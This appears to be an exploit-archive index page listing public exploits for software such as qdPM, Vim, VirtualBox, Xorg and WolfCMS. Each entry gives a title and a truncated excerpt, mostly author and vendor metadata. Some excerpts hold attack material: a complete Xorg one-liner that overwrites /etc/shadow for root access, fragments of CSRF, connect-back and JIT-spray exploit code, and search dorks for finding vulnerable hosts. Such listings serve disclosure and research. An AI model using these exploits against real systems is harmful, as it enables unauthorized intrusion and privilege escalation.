qdPM 9.1 - Remote Code Execution

qdPM 9.1 - Remote Code Execution Exploit Title: qdPM 9.1 - Remote Code Execution Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net Date: 2020-01-22 Exploit Author: Rishal Dwivedi Loginsoft Vendor Homepage: http://qdpm.net/ Software Link: http://qdpm.net/download-qdpm-free-project-managemen...

Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 - Stack Overflow (SEH)

Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 - Stack Overflow SEH Exploit Title: Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 - Stack Overflow SEH Date: 2020-01-12 Exploit Author: Antonio de la Piedra Vendor Homepage: https://www.alloksoft.com Software Link:...

GNU Mailutils 3.7 - Privilege Escalation

GNU Mailutils 3.7 - Privilege Escalation Exploit Title: GNU Mailutils 3.7 - Local Privilege Escalation Date: 2019-11-06 Exploit Author: Mike Gualtieri Vendor Homepage: https://mailutils.org/ Software Link: https://ftp.gnu.org/gnu/mailutils/mailutils-3.7.tar.gz Version: 2.0 = 3.7 Tested on: Gentoo...

Xfilesharing 2.5.1 - Arbitrary File Upload

Xfilesharing 2.5.1 - Arbitrary File Upload Exploit Title: Xfilesharing 2.5.1 - Arbitrary File Upload Google Dork: inurl:/?op=registration Date: 2019-11-4 Exploit Author: Noman Riffat Vendor Homepage: https://sibsoft.net/xfilesharing.html Version: Shell : http://xyz.com/cgi-bin/temp/joe/shell.php...

Prima Access Control 2.3.35 - HwName Persistent Cross-Site Scripting

Prima Access Control 2.3.35 - HwName Persistent Cross-Site Scripting Exploit Title: Prima Access Control 2.3.35 - 'HwName' Persistent Cross-Site Scripting Google Dork: NA Date: 2019-11-11 Exploit Author: LiquidWorm Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/ Software Link:...

eMerge E3 1.00-06 - Remote Code Execution

eMerge E3 1.00-06 - Remote Code Execution Exploit Title: eMerge E3 1.00-06 - Remote Code Execution Google Dork: NA Date: 2018-09-11 Exploit Author: LiquidWorm Vendor Homepage: http://linear-solutions.com/nscfamily/e3-series/ Software Link: http://linear-solutions.com/nscfamily/e3-series/ Version:...

eMerge E3 1.00-06 - Arbitrary File Upload

eMerge E3 1.00-06 - Arbitrary File Upload Exploit Title: eMerge E3 1.00-06 - Arbitrary File Upload Google Dork: NA Date: 2018-11-11 Exploit Author: LiquidWorm Vendor Homepage: http://linear-solutions.com/nscfamily/e3-series/ Software Link: http://linear-solutions.com/nscfamily/e3-series/ Version:...

Moxa EDR-810 - Command Injection Information Disclosure

Moxa EDR-810 - Command Injection Information Disclosure During an engagement for a client, RandoriSec found 2 vulnerabilities on Moxa EDR-810 Series Secure Routers. The first one is a command injection vulnerability found on the CLI allowing an authenticated user to obtain root privileges. And th...

V-SOL GPONEPON OLT Platform 2.03 - Unauthenticated Configuration Download

V-SOL GPONEPON OLT Platform 2.03 - Unauthenticated Configuration Download Title: V-SOL GPON/EPON OLT Platform 2.03 - Unauthenticated Configuration Download Date: 2019-09-27 Author: LiquidWorm Vendor: Guangzhou V-SOLUTION Electronic Technology Co., Ltd. Product web page: https://www.vsolcn.com...

Enigma NMS 65.0.0 - Cross-Site Request Forgery

Enigma NMS 65.0.0 - Cross-Site Request Forgery -------------------------------------------------------------------- Exploit Title: Enigma NMS Cross-Site Request Forgery CSRF Date: 21 July 2019 Author: Mark Cross @xerubus | mogozobo.com Vendor: NETSAS Pty Ltd Vendor Homepage:...

Moodle Filepicker 3.5.2 - Server Side Request Forgery

Moodle Filepicker 3.5.2 - Server Side Request Forgery Exploit Title: Server Side Request Forgery in Moodle Filepicker Google Dork: / Date: 2019-07-25 Exploit Author: Fabian Mosch & Nick Theisinger r-tec IT Security GmbH Vendor Homepage: https://moodle.org/ Software Link:...

Zoho ManageEngine ServiceDesk Plus 9.3 - SearchN.do Cross-Site Scripting

Zoho ManageEngine ServiceDesk Plus 9.3 - SearchN.do Cross-Site Scripting Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SearchN.do Date: 2019-06-04 Exploit Author: Tarantula Team - VinCSS a member of Vingroup Vendor Homepage:...

Zoho ManageEngine ServiceDesk Plus 9.3 - SolutionSearch.do Cross-Site Scripting

Zoho ManageEngine ServiceDesk Plus 9.3 - SolutionSearch.do Cross-Site Scripting Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SolutionSearch.do Date: 2019-06-04 Exploit Author: Tarantula Team - VinCSS a member of Vingroup Vendor Homepage:...

Vim 8.1.1365 Neovim 0.3.6 - Arbitrary Code Execution

Vim 8.1.1365 Neovim 0.3.6 - Arbitrary Code Execution by Arminius @rawsec Vim/Neovim Arbitrary Code Execution via Modelines ================================================= Product: Vim 8.1.1365, Neovim 0.3.6 Type: Arbitrary Code Execution CVE: CVE-2019-12735 Date: 2019-06-04 Author: Arminius...

SOCA Access Control System 180612 - SQL Injection

SOCA Access Control System 180612 - SQL Injection SOCA Access Control System 180612 SQL Injection And Authentication Bypass Vendor: SOCA Technology Co., Ltd Product web page: http://www.socatech.com Affected version: 180612, 170000 and 141007 Summary: The company's products include proximity and...

JioFi 4G M2S 1.0.2 - mask Cross-Site Scripting

JioFi 4G M2S 1.0.2 - mask Cross-Site Scripting Exploit Title: cgi-bin/qcmapwebcgi on JioFi 4G M2S 1.0.2 devices has XSS and HTML injection via the mask POST parameter. Exploit Author: Vikas Chaudhary Date: 21-01-2019 Vendor Homepage: https://www.jio.com/ Hardware Link:...

VirtualBox 6.0.4 r128413 - COM RPC Interface Code Injection Host Privilege Escalation

VirtualBox 6.0.4 r128413 - COM RPC Interface Code Injection Host Privilege Escalation VirtualBox: COM RPC Interface Code Injection Host EoP Platform: VirtualBox 6.0.4 r128413 x64 on Windows 10 1809 Class: Elevation of Privilege Summary: The hardened VirtualBox process on a Windows host doesn’t...

Bolt CMS 3.6.6 - Cross-Site Request Forgery Remote Code Execution

Bolt CMS 3.6.6 - Cross-Site Request Forgery Remote Code Execution history.pushState'', '', '/' function exploit var target = "http://127.0.0.1" var boltadminurl = target + "/bolt"; var xhr = new XMLHttpRequest; xhr.open"POST", boltadminurl + "/upload", true; xhr.setRequestHeader"Accept",...

Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities

Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities Exploit Title: Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities Discovery Date: 2018-12-05 Exploit Author: Gionathan "John" Reale Vendor Homepage: https://www.vembu.com/ Software Link : N/A Google Dork: N/A Version: 4.4....

Microsoft Windows MSHTML Engine - Edit Remote Code Execution

Microsoft Windows MSHTML Engine - Edit Remote Code Execution Exploit Title: Microsoft Windows CVE-2019-0541 MSHTML Engine "Edit" Remote Code Execution Vulnerability Google Dork: N/A Date: March, 13 2019 Exploit Author: Eduardo Braun Prado Vendor Homepage: http://www.microsoft.com/ Software Link:...

HotelDruid 2.3 - Cross-Site Scripting

HotelDruid 2.3 - Cross-Site Scripting =========================================================================================== Exploit Title: Hoteldruid 2.3 - 'nsextt' XSS Injection CVE: CVE-2019-8937 Date: 18-02-2019 Exploit Author: Mehmet EMIROGLU Vendor Homepage:...

Linux - kvm_ioctl_create_device() NULL Pointer Dereference

Linux - kvmioctlcreatedevice NULL Pointer Dereference kvmioctlcreatedevice contains the following code: dev = kzallocsizeofdev, GFPKERNEL; if !dev return -ENOMEM; dev-ops = ops; dev-kvm = kvm; mutexlock&kvm-lock; ret = ops-createdev, cd-type; if ret lock; kfreedev; return ret; listadd&dev-vmnode,...

CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)

CloudMe Sync 1.11.2 Buffer Overflow - WoW64 DEP Bypass Exploit Title: CloudMe Sync v1.11.2 Buffer Overflow - WoW64 - DEP Bypass Date: 24.01.2019 Exploit Author: Matteo Malvica Vendor Homepage:https://www.cloudme.com/en Software: https://www.cloudme.com/downloads/CloudMe1112.exe Category: Remote...

Joomla! Core 3.9.1 - Persistent Cross-Site Scripting in Global Configuration Textfilter Settings

Joomla! Core 3.9.1 - Persistent Cross-Site Scripting in Global Configuration Textfilter Settings Exploit Title: Joomla Global Configuration Text Filter settings Stored XSS Vulnerability Date: 18/01/2019 Exploit Author: Praveen Sutar , Twitter: @praveensutar123 Vendor Homepage:...

AudioCode 400HD - Command Injection

AudioCode 400HD - Command Injection CVE-2018-10093 Remote command injection vulnerability in AudioCode IP phones Description The AudioCodes 400HD series of IP phones consists in a range of easy-to-use, feature-rich desktop devices for the service provider hosted services, enterprise IP telephony...

Kubernetes - (Unauthenticated) Arbitrary Requests

Kubernetes - Unauthenticated Arbitrary Requests !/usr/bin/env python3 import argparse from ssl import wrapsocket from json import loads, dumps from socket import createconnection def requeststage1base, version, target: stage1 = "" with open'ustage1', 'r' as stage1fd: stage1 = stage1fd.read return...

Rockwell Automation Allen-Bradley PowerMonitor 1000 - Incorrect Access Control Authentication Bypass

Rockwell Automation Allen-Bradley PowerMonitor 1000 - Incorrect Access Control Authentication Bypass Exploit Title: Rockwell Automation Allen-Bradley PowerMonitor 1000 - Incorrect Access Control Date: 2018-11-27 Exploit Author: Luca.Chiou Vendor Homepage: https://www.rockwellautomation.com/...

xorg-x11-server 1.20.3 - Local Privilege Escalation

xorg-x11-server 1.20.3 - Local Privilege Escalation CVE-2018-14665 - a LPE exploit via http://X.org fits in a tweet cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su Overwrite shadow or any file on most Linux, get root privileges. BSD and any other Xorg desktop also affected...

WebKit - WebCore::RenderMultiColumnSet::updateMinimumColumnHeight Use-After-Free

WebKit - WebCore::RenderMultiColumnSet::updateMinimumColumnHeight Use-After-Free htmlvar00002, htmlvar00006 column-span: all; :root 1px; position: fixed; -webkit-column-width: 1px; .class2 text-indent: -webkit-shape-margin: 0px; -webkit-writing-mode: vertical-rl; '.' defselement, .class8 display:...

Easylogin Pro 1.3.0 - Encryptor.php Unserialize Remote Code Execution

Easylogin Pro 1.3.0 - Encryptor.php Unserialize Remote Code Execution !/usr/bin/php -c -t: target server ip with or without port -c: connectback server ip and port Example: php ./e.php -t 172.16.175.136 -c 172.16.175.137:1337 ---------------------------------------------------- mrme@pluto:$ ./e.p...

Skia - Heap Overflow in SkScan::FillPath due to Precision Error

Skia - Heap Overflow in SkScan::FillPath due to Precision Error There is a heap overflow in Skia when drawing paths with antialiasing turned off. This issue can be triggered in both Google Chrom and Mozilla Firefox by rendering a specially crafted SVG image. PoCs for both browsers are attached...

Microhard Systems 3G4G Cellular Ethernet and Serial Gateway - Default Credentials

Microhard Systems 3G4G Cellular Ethernet and Serial Gateway - Default Credentials Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Default Credentials Vendor: Microhard Systems Inc. Product web page: http://www.microhardcorp.com Affected version: IPn4G 1.1.0 build 1098 IPn3Gb 2.2.0...

VLC media player 2.2.8 - Arbitrary Code Execution (PoC)

VLC media player 2.2.8 - Arbitrary Code Execution PoC Exploit Title: VLC media player 2.2.8 - Arbitrary Code Execution PoC Date: 2018-06-06 Exploit Author: Eugene Ng Vendor Homepage: https://www.videolan.org/vlc/index.html Software Link:...

ntp 4.2.8p11 - Local Buffer Overflow (PoC)

ntp 4.2.8p11 - Local Buffer Overflow PoC Exploit Title: ntpq and ntpdc 4.2.8p11 Local Buffer Overflow Date: 2018-06-06 Exploit Author: Fakhri Zulkifli @d0lph1n98 Vendor Homepage: http://www.ntp.org/ Software Link: http://www.ntp.org/downloads.html Version: 4.2.8p11 and earlier Tested on: 4.2.8p11...

Kaspersky KSN for Linux 5.2 - Memory Corruption

Kaspersky KSN for Linux 5.2 - Memory Corruption ''' Exploit Author: Juan Sacco - http://exploitpack.com Tested on: Kali i686 GNU/Linux CVE: NotYet Exploit description: Kaspersky KSN v5.2 is prone to a remote memory corruption because it fails to properly filter the input on the remote subscribers...

WolfCMS 0.8.3.1 - Cross-Site Request Forgery

WolfCMS 0.8.3.1 - Cross-Site Request Forgery Exploit Title: WolfCMS 0.8.3.1 Cross Site Request Forgery Google Dork: N/A Date: 04-04-2018 Exploit Author: Sureshbabu Narvaneni Author Blog : http://nullnews.in Vendor Homepage: http://www.wolfcms.org Software Link: Affected Version: 0.8.3.1 Category:...

Adobe Flash 28.0.0.161 - Use-After-Free

Adobe Flash 28.0.0.161 - Use-After-Free !/usr/bin/env python coding: UTF-8 import BaseHTTPServer import sys from SimpleHTTPServer import SimpleHTTPRequestHandler print "@Syfi2k" print "+ CVE-2018-4878 poc " print "--------------------------------" print "Calc.exe Shellcode via Msfvenom" print...

Open-AuditIT Professional 2.1 - Cross-Site Request Forgery

Open-AuditIT Professional 2.1 - Cross-Site Request Forgery Exploit Title: Open-AuditIT Professional 2.1 - Cross-Site Request Forgery CSRF Date: 27-03-2018 Exploit Author: Nilesh Sapariya Contact: https://twitter.com/nileshloganx Website: https://nileshsapariya.blogspot.com Vendor Homepage:...

TestLink Open Source Test Management 1.9.16 - Remote Code Execution (PoC)

TestLink Open Source Test Management 1.9.16 - Remote Code Execution PoC Title: TestLink Open Source Test Management comment out skip-networking as well as bind-address if any presen...

Firefox 46.0.1 - ASM.JS JIT-Spray Remote Code Execution

Firefox 46.0.1 - ASM.JS JIT-Spray Remote Code Execution CVE-2016-2819 and ASM.JS JIT-Spray "use strict" var Exploit = function this.asmjs = new Asmjs this.heap = new Heap Exploit.prototype.go = function / target address of fake node object / var nodetargetaddr = 0x5a500000 / target address of...

vBulletin 5.x - cacheTemplates Remote Arbitrary File Deletion

vBulletin 5.x - cacheTemplates Remote Arbitrary File Deletion SSD Advisory – vBulletin cacheTemplates Unauthenticated Remote Arbitrary File Deletion Source: https://blogs.securiteam.com/index.php/archives/3573 Vulnerability Summary The following advisory describes a unauthenticated deserializatio...

OpenEMR 5.0.0 - OS Command Injection Cross-Site Scripting

OpenEMR 5.0.0 - OS Command Injection Cross-Site Scripting SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: OS Command Injection & Reflected Cross Site Scripting product: OpenEMR vulnerable version: 5.0.0 fixed version:...

Avaya IP Office (IPO) 10.1 - SoftConsole Remote Buffer Overflow (SEH)

Avaya IP Office IPO 10.1 - SoftConsole Remote Buffer Overflow SEH + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/AVAYA-OFFICE-IP-IPO-v9.1.0-10.1-SOFT-CONSOLE-REMOTE-BUFFER-OVERFLOW-0DAY.txt + ISR: apparitionSec Vendor:...

Debut Embedded HTTPd 1.20 - Denial of Service

Debut Embedded HTTPd 1.20 - Denial of Service Exploit Title: Remote un-authenticated DoS in Debut embedded httpd server in Brother printers Date: 11/02/2017 Exploit Author: z00n @0xz00n Vendor Homepage: http://www.brother-usa.com Version: = 1.20 CVE : CVE-2017-16249 Description: The Debut embedde...

Microsoft Game Definition File Editor 6.3.9600 - XML External Entity Injection

Microsoft Game Definition File Editor 6.3.9600 - XML External Entity Injection + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MS-WINDOWS-GAME-DEFINITION-FILE-MAKER-v6.3.9600-XML-EXTERNAL-ENTITY.txt + ISR: ApparitionSec...

PHPMyFAQ 2.9.8 - Cross-Site Scripting (1)

PHPMyFAQ 2.9.8 - Cross-Site Scripting 1 Exploit Title: phpMyFAQ 2.9.8 Stored XSS Vendor Homepage: http://www.phpmyfaq.de/ Software Link: http://download.phpmyfaq.de/phpMyFAQ-2.9.8.zip Exploit Author: Ishaq Mohammed Contact: https://twitter.com/securityprince Website:...

Docker Daemon - Unprotected TCP Socket

Docker Daemon - Unprotected TCP Socket Exploit Title: Docker Daemon - Unprotected TCP Socket Date: 20-07-2017 Exploit Author: Martin Pizala Vendor Homepage: https://www.docker.com Software Link: https://www.docker.com/get-docker Version: Since 0.4.7 2013-06-28 feature: mount host directories Test...

Geneko Routers - Path Traversal

Geneko Routers - Path Traversal Vulnerability Summary The following advisory describes a Unauthenticated Path Traversal vulnerability found in Geneko GWR routers series. Geneko GWG is compact and cost effective communications solution that provides cellular capabilities for fixed and mobile...

Mozilla Firefox - table Use-After-Free

Mozilla Firefox - table Use-After-Free body display: table function freememory try fuzzPriv.forceGC; catcherr alert'Please install domFuzzLite3'; function go var s = document.getSelection; window.find"1",true,false,true,false; s.modify"extend","forward","line";...

F5 BIG-IP SSL Virtual Server - Ticketbleed Memory Disclosure

F5 BIG-IP SSL Virtual Server - Ticketbleed Memory Disclosure / Exploit Title: Ticketbleed CVE-2016-9244 F5 BIG-IP SSL virtual server Memory Leakage Date: 10.02.2017 Exploit Author: Ege Balcı Vendor Homepage: https://f5.com/ Version: 12.0.0 - 12.1.2 && 11.4.0 - 11.6.1 Tested on: Multiple CVE :...